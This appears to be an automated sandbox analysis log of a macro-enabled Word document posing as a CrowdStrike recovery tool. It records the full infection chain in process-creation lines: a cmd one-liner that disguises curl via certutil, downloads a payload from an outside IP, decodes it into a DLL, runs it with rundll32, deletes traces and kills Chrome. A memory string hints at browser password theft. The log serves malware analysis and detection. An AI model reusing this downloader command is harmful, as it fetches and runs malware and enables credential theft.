Source: ~WRC0000.tmp.26.drOLE indicator, Word Document stream: true
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docmOLE document summary: title field not present or empty
Source: ~WRF{43F4B375-8E7A-44EF-86E3-6C5BC465D1F2}.tmp.0.drOLE document summary: title field not present or empty
Source: ~WRF{43F4B375-8E7A-44EF-86E3-6C5BC465D1F2}.tmp.0.drOLE document summary: author field not present or empty
Source: ~WRF{43F4B375-8E7A-44EF-86E3-6C5BC465D1F2}.tmp.0.drOLE document summary: edited time not present or 0
Source: ~WRF{085F5DEF-FD43-4377-836E-D631451649D2}.tmp.26.drOLE document summary: title field not present or empty
Source: ~WRF{085F5DEF-FD43-4377-836E-D631451649D2}.tmp.26.drOLE document summary: author field not present or empty
Source: ~WRF{085F5DEF-FD43-4377-836E-D631451649D2}.tmp.26.drOLE document summary: edited time not present or 0
Source: ~WRC0000.tmp.26.drOLE document summary: title field not present or empty
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;chrome.exe&quot;)
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;chrome.exe&quot;)
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\SysWOW64\xcopy.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain
Source: rundll32.exe, 00000010.00000002.5553191262.0000020A7832A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.5553191262.0000020A7835E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000024.00000003.2777616664.0000027F6C3A9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000024.00000002.4258973771.0000027F6C3A9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000024.00000002.4258973771.0000027F6C366000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000024.00000003.2777450961.0000027F6C3A9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000024.00000003.2778177784.0000027F6C3A9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docmReversingLabs: Detection: 26%
Source: curl.exeString found in binary or memory: This is not the full help, this menu is stripped into categories. Use "--help category" to get an overview of all categories. For all options use the manual or "--help all".
Source: curl.exeString found in binary or memory: This is not the full help, this menu is stripped into categories. Use "--help category" to get an overview of all categories. For all options use the manual or "--help all".
Source: curl.exeString found in binary or memory: curl: try 'curl --help' for more information
Source: curl.exeString found in binary or memory: curl: try 'curl --help' for more information
Source: curl.exeString found in binary or memory: This is not the full help, this menu is stripped into categories.Use "--help category" to get an overview of all categories.For all options use the manual or "--help all".
Source: curl.exeString found in binary or memory: This is not the full help, this menu is stripped into categories.Use "--help category" to get an overview of all categories.For all options use the manual or "--help all".
Source: curl.exeString found in binary or memory: curl: try 'curl --help' for more information
Source: curl.exeString found in binary or memory: curl: try 'curl --help' for more information
Source: curl.exeString found in binary or memory: This is not the full help, this menu is stripped into categories. Use "--help category" to get an overview of all categories. For all options use the manual or "--help all".
Source: curl.exeString found in binary or memory: This is not the full help, this menu is stripped into categories. Use "--help category" to get an overview of all categories. For all options use the manual or "--help all".
Source: curl.exeString found in binary or memory: curl: try 'curl --help' for more information
Source: curl.exeString found in binary or memory: curl: try 'curl --help' for more information
Source: curl.exeString found in binary or memory: This is not the full help, this menu is stripped into categories.Use "--help category" to get an overview of all categories.For all options use the manual or "--help all".
Source: curl.exeString found in binary or memory: This is not the full help, this menu is stripped into categories.Use "--help category" to get an overview of all categories.For all options use the manual or "--help all".
Source: curl.exeString found in binary or memory: curl: try 'curl --help' for more information
Source: curl.exeString found in binary or memory: curl: try 'curl --help' for more information
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\xcopy.exe xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\certutil.exe certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain
Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /F /IM chrome.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2084 --field-trial-handle=1976,i,14189460158267219968,9438605418759963760,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://go.microsoft.com/fwlink/?linkid=2280386"
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\xcopy.exe xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\certutil.exe certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain
Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /F /IM chrome.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\xcopy.exe xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\certutil.exe certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\certutil.exe certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain
Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /F /IM chrome.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2084 --field-trial-handle=1976,i,14189460158267219968,9438605418759963760,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\xcopy.exe xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\certutil.exe certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain
Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /F /IM chrome.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dll
Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: ulib.dll
Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: ifsutil.dll
Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: devobj.dll
Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: fsutilext.dll
Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: certcli.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: cabinet.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: cryptui.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: netapi32.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: ntdsapi.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: secur32.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: certca.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: samcli.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: dsrole.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: logoncli.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: netutils.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: msasn1.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: certcli.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: cabinet.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: cryptui.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: netapi32.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: ntdsapi.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: secur32.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: certca.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: samcli.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: dsrole.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: logoncli.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: netutils.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\curl.exeSection loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\curl.exeSection loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\curl.exeSection loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\curl.exeSection loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\curl.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: certcli.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: cabinet.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: cryptui.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: netapi32.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: ntdsapi.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: secur32.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: certca.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: samcli.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: dsrole.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: logoncli.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: netutils.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: version.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dll
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dll
Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: ulib.dll
Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: ifsutil.dll
Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: devobj.dll
Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: fsutilext.dll
Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: certcli.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: cabinet.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: cryptui.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: netapi32.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: ntdsapi.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: secur32.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: certca.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: samcli.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: dsrole.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: logoncli.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: netutils.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: msasn1.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: certcli.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: cabinet.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: cryptui.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: certca.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: netapi32.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: ntdsapi.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: secur32.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: samcli.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: dsrole.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: logoncli.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: netutils.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\curl.exeSection loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\curl.exeSection loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\curl.exeSection loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\curl.exeSection loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\curl.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: certcli.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: cabinet.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: cryptui.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: certca.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: netapi32.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: ntdsapi.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: secur32.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: samcli.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: dsrole.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: logoncli.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: netutils.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: ntasn1.dll
